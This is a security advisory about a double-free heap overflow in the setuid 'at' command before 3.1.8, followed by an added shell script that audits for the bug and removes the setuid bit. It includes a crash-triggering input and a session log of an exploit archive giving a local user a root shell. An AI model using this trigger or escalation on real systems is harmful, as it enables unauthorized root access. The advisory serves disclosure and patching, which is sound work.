at heap overflow may lead to root access



17th Jan 2002 [SBWID-5007]
COMMAND

	at heap overflow may lead to root access

SYSTEMS AFFECTED

	at before 3.1.8

PROBLEM

	Zen-parse reported:

	The 'at' command reads commands from standard input for execution at
	a later time specified on the command line. If such an execution time
	is given in a carefully drafted (but wrong) format, the at command may
	crash as a result of a surplus call to free(). The cause of the crash
	is a heap corruption that is exploitable under certain circumstances
	since the /usr/bin/at command is installed setuid root.

	To check if you are potentially vulnerable to this exploit, execute:
	/usr/bin/at 31337 + vuln. If you are vulnerable this will cause:
	"Segmentation fault"; if not, there will be a message similar to:
	"Garbled time" (possibly with some extra information). The problem is
	caused by a bug in the parser which deallocates the same memory
	location twice. This can sometimes be exploited, for the uid of
	"daemon", and due to some other minor problems, may allow root access
	from there.

	Attached is an exploit for Redhat 7.0.

	bash-2.04$ rpm -qf /lib/libc-*
	glibc-2.2.4-18.7.0.3
	bash-2.04$ rpm -qf /usr/bin/at
	at-3.1.8-12
	bash-2.04$ tar -xzf attn.tar.gz
	bash-2.04$ cd attn
	bash-2.04$ id
	uid=500(evil) gid=500(evil) groups=500(evil)
	bash-2.04$ ./doit.sh
	woot-2.04# id
	uid=0(root) gid=0(root) groups=500(evil)
	woot-2.04# echo "I was just testing something and you need to fix at or some malicious hacker could be evil." |mail -s "Fix /usr/bin/at" root
	woot-2.04# exit
	bash-2.04$

	-------------------------------------------------------------------------
	1) If this message was posted to a public forum by zen-parse@gmx.net,
	it may be redistributed without modification. 2) In any other case the
	contents of this message is confidential and not to be distributed in
	any form without express permission from the author. This document may
	contain Unclassified Controlled Nuclear Information.


SOLUTION

	A temporary workaround against the bug is to disable the at command for
	non-root users by removing the setuid bit from the /usr/bin/at command.

	Patches are available from the various integrators.

	 http://security.debian.org/dists/stable/updates/main/source/at_3.1.8-10.2.dsc
	 http://security.debian.org/dists/stable/updates/main/source/at_3.1.8-10.2.diff.gz
	 http://security.debian.org/dists/stable/updates/main/source/at_3.1.8.orig.tar.gz
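
	The check from the PROBLEM section and the workaround above, combined
	into a small audit script. This is an added example, not part of the
	original advisory; the function names and result labels are this
	example's own, and it assumes a POSIX shell, which reports a child
	killed by SIGSEGV as exit status 139.

```shell
#!/bin/sh
# Added example, not part of the advisory. The default path is the one the
# advisory names; function names and result labels are this example's own.

# True if the file exists and carries the setuid bit.
is_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# Run the advisory's check and classify the outcome:
#   potentially-vulnerable  process killed by SIGSEGV (shell status 128+11)
#   not-vulnerable          parser rejected the time with "Garbled time"
#   unknown                 anything else (e.g. at is not installed)
probe_at() {
    out=$("$1" 31337 + vuln </dev/null 2>&1) && status=0 || status=$?
    if [ "$status" -eq 139 ]; then
        echo potentially-vulnerable
    elif printf '%s\n' "$out" | grep -qi 'garbled time'; then
        echo not-vulnerable
    else
        echo unknown
    fi
}

# Workaround from SOLUTION: remove the setuid bit (needs root on a real
# install), then confirm it is gone. Non-root users lose at until patched.
drop_setuid() {
    chmod u-s "$1" && ! is_setuid "$1"
}

# One-line summary suitable for a host inventory.
audit_at() {
    bin=${1:-/usr/bin/at}
    if is_setuid "$bin"; then suid=yes; else suid=no; fi
    echo "$bin setuid=$suid probe=$(probe_at "$bin")"
}

# Report by default; "--fix [path]" applies the workaround instead.
if [ "${1:-}" = "--fix" ]; then
    drop_setuid "${2:-/usr/bin/at}"
else
    audit_at "${1:-/usr/bin/at}"
fi
```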

	

